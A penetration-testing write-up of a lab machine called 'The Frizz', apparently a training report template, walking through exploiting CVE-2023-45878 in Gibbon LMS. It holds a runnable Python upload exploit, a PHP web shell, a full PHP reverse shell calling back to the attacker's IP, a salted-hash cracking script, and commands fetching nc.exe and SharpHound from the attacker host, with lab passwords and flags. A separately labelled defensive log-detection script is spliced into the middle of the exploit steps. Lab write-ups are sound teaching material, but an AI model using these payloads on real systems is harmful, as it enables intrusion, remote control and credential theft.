The Frizz

General Information

IP address: 10.10.11.60
Operating System Name (Distribution): Microsoft Windows Server 2022 Datacenter
Operating System Kernel Version: 10.0.20348 N/A Build 20348
Web Server Software and Version: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Open Ports: 22, 53, 80, 88, 135, 139, 389, 445, 464, 593, 636, 3269

Flags Found

💡 Paste the flag into the designated section. In addition, attach a screenshot of the screen where the flag was found to this section.

User Flag

💡 User Flag: 4a279e844a63ab3a5f375ba3438da57969e

Root Flag

💡 Root Flag: a1d4a462107bc2267d2af068b019e369694

Vulnerabilities Found

💡 Fill in every vulnerability you found here and leave a link for more detailed information about it. You must also explain here what the vulnerability can lead to and which exploit it can be broken with. The first vulnerability listed is given to you as an example. Enter as many vulnerabilities as you can find.

CVE ID: CVE-XXXX-XXXX (template row)
Description: This CVE exists in version 2.X.X of application X and helps an attacker carry out attack X. This vulnerability is called vulnerability X. It can be studied in detail via this link. [Leave a link.]
Link: An exploit link must be given if one exists.

CVE ID: CVE-2023-45878
Description: This CVE exists in version 25.0.01 of the Gibbon application and helps an attacker upload a shell and execute it. This vulnerability is called a File Upload vulnerability. It can be studied in detail via the links below.
Links:
https://nvd.nist.gov/vuln/detail/CVE-2023-45878
https://herolab.usd.de/security-advisories/usd-2023-0025/

Report

💡 Write in detail what you did at each step, explained with screenshots and the exploits used.

Enumeration (Information Gathering)

┌──(kali㉿kali)-[~]
└─$ nmap -sSCV -Pn 10.10.11.60 --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-19 08:58 EDT
Nmap scan report for frizzdc.frizz.htb (10.10.11.60)
Host is up (0.098s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp   open  domain        (generic dns response: SERVFAIL)
| fingerprint-strings:
|   DNS-SD-TCP:
|     _services
|     _dns-sd
|     _udp
|_    local
80/tcp   open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
| http-title: Education — Walkerville Elementary School
|_Requested resource was http://frizzdc.frizz.htb/home/
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-19 19:58:54Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.95%I=7%D=3/19%Time=67DABF9D%P=x86_64-pc-linux-gnu%r(DNS-
SF:SD-TCP,30,"\0\.\0\0\x80\x82\0\x01\0\0\0\0\0\0\t_services\x07_dns-sd\x04
SF:_udp\x05local\0\0\x0c\0\x01");
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-03-19T19:59:15
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: 6h59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.78 seconds

There is a website on port 80, so we open it.

There is a Staff login button; we go to that login page.

It is a Gibbon-LMS page, so we scan it:


┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://frizzdc.frizz.htb/Gibbon-LMS -w /usr/share/wordlists/dirb/common.txt -t 60
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://frizzdc.frizz.htb/Gibbon-LMS
[+] Method:                  GET
[+] Threads:                 60
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 306]
/.htaccess            (Status: 403) [Size: 306]
/akeeba.backend.log   (Status: 403) [Size: 306]
/.htpasswd            (Status: 403) [Size: 306]
/aux                  (Status: 403) [Size: 306]
/com2                 (Status: 403) [Size: 306]
/com3                 (Status: 403) [Size: 306]
/com1                 (Status: 403) [Size: 306]
/con                  (Status: 403) [Size: 306]
/development.log      (Status: 403) [Size: 306]
/favicon.ico          (Status: 200) [Size: 32988]
/installer            (Status: 301) [Size: 361] [--> http://frizzdc.frizz.htb/Gibbon-LMS/installer/]
/index.php            (Status: 200) [Size: 22064]
/lib                  (Status: 301) [Size: 355] [--> http://frizzdc.frizz.htb/Gibbon-LMS/lib/]
[ERROR] Get "http://frizzdc.frizz.htb/Gibbon-LMS/_js": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://frizzdc.frizz.htb/Gibbon-LMS/_fpclass": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://frizzdc.frizz.htb/Gibbon-LMS/_cache": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://frizzdc.frizz.htb/Gibbon-LMS/_includes": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://frizzdc.frizz.htb/Gibbon-LMS/_img": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://frizzdc.frizz.htb/Gibbon-LMS/_layouts": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://frizzdc.frizz.htb/Gibbon-LMS/_images": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://frizzdc.frizz.htb/Gibbon-LMS/_install": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
/license              (Status: 200) [Size: 35113]
/LICENSE              (Status: 200) [Size: 35113]
[ERROR] Get "http://frizzdc.frizz.htb/Gibbon-LMS/_lib": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
/lpt1                 (Status: 403) [Size: 306]
/lpt2                 (Status: 403) [Size: 306]
/modules              (Status: 301) [Size: 359] [--> http://frizzdc.frizz.htb/Gibbon-LMS/modules/]
/nul                  (Status: 403) [Size: 306]
/php.ini              (Status: 403) [Size: 306]
/prn                  (Status: 403) [Size: 306]
/production.log       (Status: 403) [Size: 306]
/Resources            (Status: 301) [Size: 361] [--> http://frizzdc.frizz.htb/Gibbon-LMS/Resources/]
/resources            (Status: 301) [Size: 361] [--> http://frizzdc.frizz.htb/Gibbon-LMS/resources/]

There is a modules directory. Now we research what Gibbon-LMS is and which vulnerabilities it has.

We open https://nvd.nist.gov/vuln/detail/CVE-2023-45878 and
https://herolab.usd.de/security-advisories/usd-2023-0025/

Now we check whether the Rubrics module is present:


┌──(kali㉿kali)-[~]
└─$ curl -I http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php
HTTP/1.1 200 OK
Date: Wed, 19 Mar 2025 20:57:19 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Set-Cookie: G60fa1cd0af7be78b=1d654e8norcepkuunfmaoalh29; path=/; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html; charset=UTF-8

Exploitation (Breaking In)

It is present, so now we try the CVE:

import requests
import base64

# Target URL of the vulnerable Gibbon LMS instance
url = "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php"

# Base64 encoded PHP payload for system command execution
php_payload = "<?php echo system($_GET['cmd']);?>"
encoded_php_payload = base64.b64encode(php_payload.encode()).decode()

# File path to write the payload (this could be modified depending on the server's configuration)
path = "myshell.php"  # The PHP shell that will be written on the server

# gibbonPersonID (just needs to be padded to 10 characters, can be any value)
gibbonPersonID = "0000000001"

# Payload for the POST request
payload = {
    "img": f"image/png;asdf,{encoded_php_payload}",  # The payload with the base64 encoded PHP code
    "path": path,  # The file name to write the payload to
    "gibbonPersonID": gibbonPersonID  # gibbonPersonID parameter
}

# Sending the POST request to the server
response = requests.post(url, data=payload)

# Check the response
if response.status_code == 200:
    print(f"Payload sent successfully to {url}. The file should be accessible at: {url.rsplit('/', 1)[0]}/{path}")
else:
    print(f"Failed to send payload. HTTP status code: {response.status_code}")

Verbose variant:

import requests
import base64

# Target URL of the vulnerable Gibbon LMS instance
url = "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php"

# Base64 encoded PHP payload for system command execution
php_payload = "<?php echo system($_GET['cmd']);?>"
encoded_php_payload = base64.b64encode(php_payload.encode()).decode()

# File path to write the payload (this could be modified depending on the server's configuration)
path = "myshell.php"  # The PHP shell that will be written on the server

# gibbonPersonID (just needs to be padded to 10 characters, can be any value)
gibbonPersonID = "0000000001"

# Payload for the POST request
payload = {
    "img": f"image/png;asdf,{encoded_php_payload}",  # The payload with the base64 encoded PHP code
    "path": path,  # The file name to write the payload to
    "gibbonPersonID": gibbonPersonID  # gibbonPersonID parameter
}

# Print request details
print(f"[+] Sending POST request to {url}")
print("[+] Headers:")
print("    Content-Type: application/x-www-form-urlencoded")
print("[+] Payload:")
for key, value in payload.items():
    print(f"    {key}: {value}")

# Sending the POST request to the server
response = requests.post(url, data=payload)

# Print response details
print("\n[+] Server Response:")
print(f"    Status Code: {response.status_code}")
print(f"    Headers: {response.headers}")
print(f"    Body:\n{response.text}")

# Check the response
if response.status_code == 200:
    shell_url = f"{url.rsplit('/', 1)[0]}/{path}"
    print(f"[+] Payload sent successfully! The shell should be accessible at: {shell_url}")
else:
    print(f"[-] Failed to send payload. HTTP status code: {response.status_code}")

We run it:

┌──(kali㉿kali)-[~]
└─$ python3 shell.py
[+] Sending POST request to http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php
[+] Headers:
    Content-Type: application/x-www-form-urlencoded
[+] Payload:
    img: image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pg==
    path: myshell.php
    gibbonPersonID: 0000000001

[+] Server Response:
    Status Code: 200
    Headers: {'Date': 'Wed, 19 Mar 2025 21:02:06 GMT', 'Server': 'Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12', 'Set-Cookie': 'G60fa1cd0af7be78b=p4g3ssv5o17dinft0msi8lgd7u; path=/; HttpOnly; SameSite=Lax', 'X-Frame-Options': 'SAMEORIGIN', 'Pragma': 'no-cache', 'Cache-Control': 'max-age=0, no-cache, no-store, must-revalidate', 'Expires': 'Thu, 1 Jan 1970 00:00:00 GMT', 'Content-Length': '11', 'Keep-Alive': 'timeout=5, max=100', 'Connection': 'Keep-Alive', 'Content-Type': 'text/html; charset=UTF-8'}
    Body:
myshell.php
[+] Payload sent successfully! The shell should be accessible at: http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/myshell.php
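Added example, not part of this writeup and not Gibbon's code: from the defender's side, the request above leaves two traces in the Apache access log, a POST to rubrics_visualise_saveAjax.php and a later GET of a PHP file that a clean install does not ship under modules/Rubrics. The script parses combined-format log lines and correlates the two per source IP. The sample lines, the source IPs (198.51.100.23 and the 192.0.2.x addresses) and the allowlist of known Rubrics PHP files are constructed assumptions.

```python
# Added example: detect CVE-2023-45878-style abuse in Apache access logs.
# Not from the writeup or from Gibbon; sample lines, IPs and the allowlist are constructed.
import re
from collections import defaultdict

# Constructed Apache "combined" log lines (the source IPs are made up for this example).
SAMPLE_LOG = """\
198.51.100.23 - - [19/Mar/2025:21:02:06 +0000] "POST /Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php HTTP/1.1" 200 11 "-" "python-requests/2.31.0"
198.51.100.23 - - [19/Mar/2025:21:02:40 +0000] "GET /Gibbon-LMS/modules/Rubrics/myshell.php?cmd=whoami HTTP/1.1" 200 87 "-" "Mozilla/5.0"
192.0.2.5 - - [19/Mar/2025:21:05:11 +0000] "GET /Gibbon-LMS/index.php HTTP/1.1" 200 22064 "-" "Mozilla/5.0"
192.0.2.7 - - [19/Mar/2025:21:06:02 +0000] "GET /Gibbon-LMS/modules/Rubrics/rubrics_visualise.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
not a log line
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

VULN_ENDPOINT = "/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php"
RUBRICS_DIR = "/Gibbon-LMS/modules/Rubrics/"
# Assumed allowlist of PHP files expected under modules/Rubrics; build it from a clean install.
KNOWN_RUBRICS_PHP = {"rubrics_visualise.php", "rubrics_visualise_saveAjax.php"}


def parse_line(line):
    """Return the request fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path_only"] = rec["path"].split("?", 1)[0]  # drop the query string (?cmd=...)
    return rec


def find_indicators(log_text):
    """List (indicator, ip, request path) tuples for the two traces the exploit leaves."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path_only"] == VULN_ENDPOINT:
            # Weak signal on its own: legitimate use of the endpoint also produces a POST.
            findings.append(("saveajax_write", rec["ip"], rec["path"]))
        elif rec["path_only"].startswith(RUBRICS_DIR) and rec["path_only"].endswith(".php"):
            name = rec["path_only"].rsplit("/", 1)[1]
            if name not in KNOWN_RUBRICS_PHP:
                # Strong signal: a PHP file the module does not ship is being executed.
                findings.append(("unknown_php_in_rubrics", rec["ip"], rec["path"]))
    return findings


def correlate(findings):
    """Source IPs that both wrote through the endpoint and then requested an unknown PHP file."""
    seen = defaultdict(set)
    for indicator, ip, _ in findings:
        seen[ip].add(indicator)
    return {ip for ip, kinds in seen.items() if {"saveajax_write", "unknown_php_in_rubrics"} <= kinds}


if __name__ == "__main__":
    hits = find_indicators(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print("correlated sources:", correlate(hits))
```

Run it against a real access log by replacing SAMPLE_LOG with the file contents; the allowlist is the part that has to be maintained, since any PHP file appearing under the module directory that is not in it is the actual evidence of a write.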

It worked. Now we try running a command from the browser:

http://frizzdc.frizz.htb/Gibbon-LMS/myshell.php?cmd=whoami

That worked too, so now we upload a PHP file for a reverse shell:

import requests
import base64

url = "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php"

# PHP reverse shell payload for Windows: the class below connects back to the listener and
# pipes cmd.exe through the socket (the original is minified; here it is split at method boundaries)
php_payload = r"""
<?php
class Sh{
private $a=null;private $p=null;private $os=null;private $sh=null;
private $des=array(0=>array('pipe','r'),1=>array('pipe','w'),2=>array('pipe','w'));
private $b=1024;private $c=0;private $e=false;private $sd=true;
public function __construct($a,$p){$this->a=$a;$this->p=$p;}
private function det(){$d=true;$os=PHP_OS;if(stripos($os,'LINUX')!==false||stripos($os,'DARWIN')!==false){$this->os='LINUX';$this->sh='/bin/sh';}else if(stripos($os,'WINDOWS')!==false||stripos($os,'WINNT')!==false||stripos($os,'WIN32')!==false){$this->os='WINDOWS';$this->sh='cmd.exe';}else{$d=false;echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n";}return $d;}
private function daem(){$e=false;if(!function_exists('pcntl_fork')){echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n";}else if(($pid=@pcntl_fork())<0){echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n";}else if($pid>0){$e=true;echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n";}else if(posix_setsid()<0){echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n";}else{echo "DAEMONIZE: Completed successfully!\n";}return $e;}
private function sett(){@error_reporting(0);@set_time_limit(0);@umask(0);}
private function d($d){if($this->sd){$d=str_replace('<','&lt;',$d);$d=str_replace('>','&gt;',$d);echo $d;}}
private function r($s,$n,$b){if(($d=@fread($s,$b))===false){$this->e=true;echo"STRM_ERROR: Cannot read from {$n}, script will now exit...\n";}return $d;}
private function w($s,$n,$d){if(($by=@fwrite($s,$d))===false){$this->e=true;echo"STRM_ERROR: Cannot write to {$n}, script will now exit...\n";}return $by;}
private function rw($i,$o,$in,$on){while(($d=$this->r($i,$in,$this->b))&&$this->w($o,$on,$d)){if($this->os==='WINDOWS'&&$on==='STDIN'){$this->c+=strlen($d);}$this->d($d);}}
private function brw($i,$o,$in,$on){$s=fstat($i)['size'];if($this->os==='WINDOWS'&&$in==='STDOUT'&&$this->c){while($this->c>0&&($by=$this->c>=$this->b?$this->b:$this->c)&&$this->r($i,$in,$by)){$this->c-=$by;$s-=$by;}}while($s>0&&($by=$s>=$this->b?$this->b:$s)&&($d=$this->r($i,$in,$by))&&$this->w($o,$on,$d)){$s-=$by;$this->d($d);}}
public function rn(){if($this->det()&&!$this->daem()){$this->sett();$soc=@fsockopen($this->a,$this->p,$ern,$ers,30);if(!$soc){echo"SOC_ERROR: {$ern}: {$ers}\n";}else{stream_set_blocking($soc,false);$proc=@proc_open($this->sh,$this->des,$ps,null,null);if(!$proc){echo "PROC_ERROR: Cannot start the shell\n";}else{foreach($ps as $p){stream_set_blocking($p,false);}$stat=proc_get_status($proc);@fwrite($soc,"SOCKET: Shell has connected! PID: {$stat['pid']}\n");do{$stat=proc_get_status($proc);if(feof($soc)){echo "SOC_ERROR: Shell connection has been terminated\n";break;}else if(feof($ps[1])||!$stat['running']){echo "PROC_ERROR: Shell process has been terminated\n";break;}$s=array('read'=>array($soc,$ps[1],$ps[2]),'write'=>null,'except'=>null);$ncs=@stream_select($s['read'],$s['write'],$s['except'],0);if($ncs===false){echo "STRM_ERROR: stream_select() failed\n";break;}else if($ncs>0){if($this->os==='LINUX'){if(in_array($soc,$s['read'])){$this->rw($soc,$ps[0],'SOCKET','STDIN');}if(in_array($ps[2],$s['read'])){$this->rw($ps[2],$soc,'STDERR','SOCKET');}if(in_array($ps[1],$s['read'])){$this->rw($ps[1],$soc,'STDOUT','SOCKET');}}else if($this->os==='WINDOWS'){if(in_array($soc,$s['read'])){$this->rw($soc,$ps[0],'SOCKET','STDIN');}if(($f=fstat($ps[2]))&&$f['size']){$this->brw($ps[2],$soc,'STDERR','SOCKET');}if(($f=fstat($ps[1]))&&$f['size']){$this->brw($ps[1],$soc,'STDOUT','SOCKET');}}}}while(!$this->e);foreach($ps as $p){fclose($p);}proc_close($proc);}fclose($soc);}}}
}
echo '<pre>';$sh=new Sh('10.10.14.109',5555);$sh->rn();unset($sh);/*@gc_collect_cycles();*/echo '</pre>';
?>
"""

encoded_php_payload = base64.b64encode(php_payload.encode()).decode()
path = "shell.php"  # The PHP shell that will be written on the server
gibbonPersonID = "0000000001"

payload = {
    "img": f"image/png;asdf,{encoded_php_payload}",  # The payload with the base64 encoded PHP code
    "path": path,  # The file name to write the payload to
    "gibbonPersonID": gibbonPersonID  # gibbonPersonID parameter
}

response = requests.post(url, data=payload)

if response.status_code == 200:
    print(f"Payload sent successfully to {url}. The file should be accessible at: {url.rsplit('/', 1)[0]}/{path}")
else:
    print(f"Failed to send payload. HTTP status code: {response.status_code}")

┌──(kali㉿kali)-[~]
└─$ python3 revshell.py
Payload sent successfully to http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php. The file should be accessible at: http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/shell.php

Now we open http://frizzdc.frizz.htb/Gibbon-LMS/shell.php and listen with nc -lvnp 5555:

C:\xampp\htdocs\Gibbon-LMS>dir C:\xampp\mysql\bin\mysql.exe
 Volume in drive C has no label.
 Volume Serial Number is D129-C3DA

 Directory of C:\xampp\mysql\bin

10/30/2023  05:58 AM         3,784,616 mysql.exe
               1 File(s)      3,784,616 bytes
               0 Dir(s)   1,572,188,160 bytes free

C:\xampp\htdocs\Gibbon-LMS>dir config.php
 Volume in drive C has no label.
 Volume Serial Number is D129-C3DA

 Directory of C:\xampp\htdocs\Gibbon-LMS

10/11/2024  08:15 PM             1,307 config.php
               1 File(s)          1,307 bytes
               0 Dir(s)   1,674,522,624 bytes free

C:\xampp\htdocs\Gibbon-LMS>type config.php
<?php
/*
Gibbon, Flexible & Open School System
Copyright (C) 2010, Ross Parker

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*/

/**
 * Sets the database connection information.
 * You can supply an optional $databasePort if your server requires one.
 */
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';

/**
 * Sets a globally unique id, to allow multiple installs on a single server.
 */
$guid = '7y59n5xz-uym-ei9p-7mmq-83vifmtyey2';

/**
 * Sets system-wide caching factor, used to balance performance and freshness.
 * Value represents number of page loads between cache refresh.
 * Must be positive integer. 1 means no caching.
 */
$caching = 10;

Now we connect to the database with mysql.exe using these credentials:

C:\xampp\mysql\bin>mysql.exe -u MrGibbonsDB -p"MisterGibbs!Parrot!?1" -e "SHOW DATABASES;"
Database
gibbon
information_schema
test

C:\xampp\mysql\bin>mysql.exe -u MrGibbonsDB -p"MisterGibbs!Parrot!?1" -e "USE gibbon; SELECT * FROM gibbonperson;"
gibbonPersonID title surname firstName preferredName officialName nameInCharacters gender username passwordStrong passwordStrongSalt passwordForceReset status canLogin gibbonRoleIDPrimary gibbonRoleIDAll dob email emailAlternate image_240 lastIPAddress lastTimestamp lastFailIPAddress lastFailTimestamp failCount address1 address1District address1Country address2 address2District address2Country phone1Type phone1CountryCode phone1 phone3Type phone3CountryCode phone3 phone2Type phone2CountryCode phone2 phone4Type phone4CountryCode phone4 website languageFirst languageSecond languageThird countryOfBirth birthCertificateScan ethnicity religion profession employer jobTitle emergency1Name emergency1Number1 emergency1Number2 emergency1Relationship emergency2Name emergency2Number1 emergency2Number2 emergency2Relationship gibbonHouseID studentID dateStart dateEnd gibbonSchoolYearIDClassOf lastSchool nextSchool departureReason transport transportNotes calendarFeedPersonal viewCalendarSchool viewCalendarPersonal viewCalendarSpaceBooking gibbonApplicationFormID lockerNumber vehicleRegistration personalBackground messengerLastRead privacy dayType gibbonThemeIDPersonal gibboni18nIDPersonal studentAgreements googleAPIRefreshToken microsoftAPIRefreshToken genericAPIRefreshToken receiveNotificationEmails mfaSecret mfaToken cookieConsent fields
0000000001 Ms. Frizzle Fiona Fiona Fiona Frizzle Unspecified f.frizzle 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03 /aACFhikmNopqrRTVz2489 N Full Y 001 001 NULL f.frizzle@frizz.htb NULL NULL ::1 2024-10-29 09:28:59 10.10.16.68 2025-03-19 17:12:05 1 NULL NULL NULL NULL Y Y N NULL NULL NULL NULL NULL NULL NULL Y NULL NULL NULL

C:\xampp\mysql\bin>

From the row we take the salt and the hash:

salt: /aACFhikmNopqrRTVz2489
hash: 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03

Now we crack it:

import hashlib

hash_to_crack = "067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03"
salt = "/aACFhikmNopqrRTVz2489"

# The stored value is sha256(salt + password) as hex, so each wordlist entry is hashed the same way
with open("/usr/share/wordlists/rockyou.txt", "r", encoding="latin-1") as f:
    for password in f:
        password = password.strip()
        hashed = hashlib.sha256((salt + password).encode()).hexdigest()
        if hashed == hash_to_crack:
            print(f"Password found: {password}")
            break

===============================================================

┌──(kali㉿kali)-[~]
└─$ python3 crack_sha256_salted.py
Password found: Jenni_Luvs_Magic23

Initial Access (Gaining Access)

username: f.frizzle
password: Jenni_Luvs_Magic23

Now we obtain a TGT for the f.frizzle user; first, the Kerberos client configuration:

sudo nano /etc/krb5.conf

=======================================
[libdefaults]
    default_realm = FRIZZ.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = true
    ticket_lifetime = 24h
    forwardable = true
[realms]
    FRIZZ.HTB = {
        kdc = frizzdc.frizz.htb
        admin_server = frizzdc.frizz.htb
        default_domain = frizz.htb
    }
[domain_realm]
    .frizz.htb = FRIZZ.HTB
    frizz.htb = FRIZZ.HTB
==============================================
sudo nano /etc/hosts

10.10.11.60 frizzdc.frizz.htb frizz.htb

Note that the nmap scan reported a clock skew of 6h59m59s against the DC; Kerberos rejects requests whose timestamp differs from the KDC's clock by more than five minutes, so the client clock must be aligned with the DC before kinit will succeed.

Now we obtain the TGT, entering the password when prompted:

┌──(kali㉿kali)-[~]
└─$ kinit f.frizzle@FRIZZ.HTB
Password for f.frizzle@FRIZZ.HTB:

┌──(kali㉿kali)-[~]
└─$ klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: f.frizzle@FRIZZ.HTB

Valid starting       Expires              Service principal
03/19/2025 18:18:19  03/20/2025 04:18:19  krbtgt/FRIZZ.HTB@FRIZZ.HTB
	renew until 03/20/2025 18:18:09

┌──(kali㉿kali)-[~]
└─$ ssh f.frizzle@frizz.htb -K

PowerShell 7.4.5
PS C:\Users\f.frizzle>
PS C:\Users\f.frizzle> cd /
PS C:\> mkdir Temp

    Directory: C:\

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d----           3/19/2025  3:30 PM                Temp

frizz\f.frizzle@FRIZZDC C:\>dir /a C:\
 Volume in drive C has no label.
 Volume Serial Number is D129-C3DA

 Directory of C:\

10/29/2024  07:31 AM    <DIR>          $RECYCLE.BIN
03/10/2025  03:31 PM    <DIR>          $WinREAgent
02/20/2025  03:51 PM    <DIR>          Config.Msi
10/29/2024  09:12 AM    <JUNCTION>     Documents and Settings [C:\Users]
10/29/2024  08:27 AM            12,288 DumpStack.log.tmp
03/10/2025  03:39 PM    <DIR>          inetpub
05/08/2021  01:15 AM    <DIR>          PerfLogs
02/26/2025  09:13 AM    <DIR>          Program Files
05/08/2021  02:34 AM    <DIR>          Program Files (x86)
02/20/2025  03:50 PM    <DIR>          ProgramData
10/29/2024  09:12 AM    <DIR>          Recovery
10/29/2024  07:25 AM    <DIR>          System Volume Information
10/29/2024  07:31 AM    <DIR>          Users
03/10/2025  03:41 PM    <DIR>          Windows
10/29/2024  07:28 AM    <DIR>          xampp
               1 File(s)         12,288 bytes
              14 Dir(s)   1,672,814,592 bytes free

frizz\f.frizzle@FRIZZDC C:\>dir /a C:\$Recycle.Bin\
 Volume in drive C has no label.
 Volume Serial Number is D129-C3DA

 Directory of C:\$Recycle.Bin

10/29/2024  07:31 AM    <DIR>          .
03/10/2025  03:39 PM    <DIR>          ..
10/29/2024  07:31 AM    <DIR>          S-1-5-21-2386970044-1145388522-2932701813-1103
               0 File(s)              0 bytes
               3 Dir(s)   1,672,818,688 bytes free

frizz\f.frizzle@FRIZZDC C:\>dir /a C:\$Recycle.Bin\S-1-5-21-2386970044-1145388522-2932701813-1103
 Volume in drive C has no label.
 Volume Serial Number is D129-C3DA

 Directory of C:\$Recycle.Bin\S-1-5-21-2386970044-1145388522-2932701813-1103

10/29/2024  07:31 AM    <DIR>          .
10/29/2024  07:31 AM    <DIR>          ..
10/29/2024  07:31 AM               148 $IE2XMEG.7z
10/24/2024  09:16 PM        30,416,987 $RE2XMEG.7z
10/29/2024  07:31 AM               129 desktop.ini
               3 File(s)     30,417,264 bytes
               2 Dir(s)   1,672,753,152 bytes free

Inside the archive there is the M.schoolbus user together with their password, !suBcig@MehTed!R.

PS C:\> mkdir Temp

    Directory: C:\

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          3/19/2025  4:05 PM                Temp

PS C:\> cd Temp
PS C:\Temp>
PS C:\Temp> Invoke-WebRequest -Uri "http://10.10.14.109:8000/nc.exe" -OutFile "C:\Temp\nc.exe"
PS C:\Temp> dir

    Directory: C:\Temp

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          3/19/2025  4:05 PM          38616 nc.exe

PS C:\Temp> Invoke-WebRequest -Uri "http://10.10.14.109:8000/SharpHound.exe" -OutFile "C:\Temp\SharpHound.exe"
PS C:\Temp> dir

    Directory: C:\Temp

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          3/19/2025  4:05 PM          38616 nc.exe
-a----          3/19/2025  4:20 PM         906752 SharpHound.exe

PS C:\Temp> .\SharpHound.exe -c All --zipfilename frizzle
2025-03-19T16:21:50.1640659-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2025-03-19T16:21:50.1640659-07:00|INFORMATION|Initializing SharpHound at 4:21 PM on 3/19/2025
2025-03-19T16:21:50.5545689-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
